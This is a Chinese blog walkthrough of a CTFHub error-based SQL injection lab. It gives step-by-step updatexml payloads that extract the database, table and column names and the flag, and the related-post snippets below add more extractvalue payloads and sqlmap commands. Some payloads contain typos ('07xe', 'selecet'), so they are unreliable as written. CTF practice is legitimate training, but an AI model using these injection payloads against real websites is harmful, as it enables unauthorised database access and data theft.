CTFHub-报错注入

最新推荐文章于 2024-06-10 08:30:00 发布
最新推荐文章于 2024-06-10 08:30:00 发布
阅读量191 收藏
点赞数 2
分类专栏: CTFHub 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51589948/article/details/116893923
版权

报错注入

  1. .在输入1后发现没有获取任何有关数据库的信息,只显示查询正确,根据报错注入的回显情况(页面会返回错误信息,或者将语句查询到的不完全的数据返回到页面),猜测为报错注入
    在这里插入图片描述

  2. 然后使用updatexml的语法尝试进行报错注入
    -1 union select updatexml(1,concat(0x7e,(select database()),0x7e),1)
    在这里插入图片描述
    得到库名为sqli

  3. 得出信息,可判断为报错注入,继续查询表名
    -1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema=‘sqli’),07xe),1)
    在这里插入图片描述

  4. 进一步查询falg的所有的字段名
    -1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema=‘sqli’ and table_name=‘falg’),0x7e),1)
    在这里插入图片描述

  5. 查询该库该表该行的数据
    -1 union select updatexml(1,concat(07xe,(selecet(group_concat(flag))from sqli.flag),0x7e),1)
    在这里插入图片描述
    得出flag

混混的小胖子233
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CtfHub-wp(web)
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctf-all-in-one
01-30
ctf-all-in-one
CTFHUB报错注入的几种不同方式
PigletTT的博客
07-04 1102
CFTHUB 报错注入 一、报错注入原理 1.xml函数updatexml() UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; 该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2535
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
CTFHUB-SQL注入-报错注入
最新发布
weixin_68416970的博客
06-10 425
报错注入是一种SQL注入技术的变种,攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序,攻击者利用数据库的错误处理机制,将希望得到的信息嵌入到可能导致错误的SQL语句中,从而使错误信息透露出所需的数据。
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2932
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
ctfhub-报错注入
m0_62094846的博客
12-22 440
查找库名 1 and extractvalue(1,concat(0x7e,database(),0x7e)) 查找表名 1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 查找字段 1 and extractvalue(1,concat(0x7e,(select gr..
CTFHub - 报错注入
Have_a_great_day的博客
09-09 624
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTFtools-SNOW.zip
11-03
Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息“ -p "文件名
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
CTFHub 报错注入
weixin_44732566的博客
02-20 4199
CTFHub 报错注入 当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
CTFHub报错注入
sGanYu
07-24 1841
手动注入 发现无论输入什么,都只会回显成功或者错误 可以根据updatexml的报错注入来获取信息 updatexml (string, xpath_string, string) 第一个参数:可以输入1,为XML文档对象的名称 第二个参数:xpath_string ,提取多个子节点的文本 第三个参数:可以输入1,替换查找的符合条件的参数 0x7e是一个代表~的十六进制,可以用’%’,或者’~’来代替 查询出两个表,一个为news一个为flag,这里也可以把'sqli'换成database
CTFHUB-报错注入
Web学习之路
03-21 233
理解
CTFhub 报错注入
plant1234的博客
06-16 221
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
SQL学习(CTFhub)整数型注入,字符型注入,报错注入 -----手工注入+ sqlmap注入
qq_73861475的博客
11-13 551
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段。id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump。id=1 -D (数据库名) -T (输入需要查询的表名) --columns。-1' union select 1,database() #(这里的-1和整数型注入的情况一样)那就输入1' ,发现报错没有回显,接着输入1' and 1=1。
CTFHub_技能树_Web之SQL注入——报错注入详细原理讲解(含三种解法原理讲解)
Ho1aAs‘s Blog
12-20 1042
文章目录一、报错注入原理报错注入常用函数floor()extractvalue()、updatexml()原理二、注入过程Ⅰ、使用floor()1.查询表名2.查询列名3.查值Ⅱ、使用extractvalue()1.查询表名2.查询列名3.查值Ⅲ、使用updatexml()1.查询表名2.查询列名3.查值 一、报错注入原理 报错注入,通过运行SQL查询语句,回显查询结果。由于某些函数的神奇操作会使得传入参数先运行,而被报错抛出,能够直接查看参数的运行情况,因而实现查询。 报错注入常用函数 《代码审计:企业
字符型注入,报错注入
Dug123456_的博客
04-03 2332
输入不同种的语句 显示的不同 存在sql漏洞输入1发现id=‘1’,所以为字符型注入。
CTFHub 技能树之报错注入
qq_47271638的博客
05-28 505
首先测试注入点 and1=1 ;'and 1=1 ;'and 1=2, ?id=2-1;一起加上测试 发现没有回显初步判断可能是报错注入或者是时间盲注或者布尔盲注; 假设为报错注入. 查询数据库 构造注入语句 : ?id=1 and updatexml(1,concat(’~’,(select database())),1)– 得到数据库名:sqli 查询数据表 构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(table_name
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值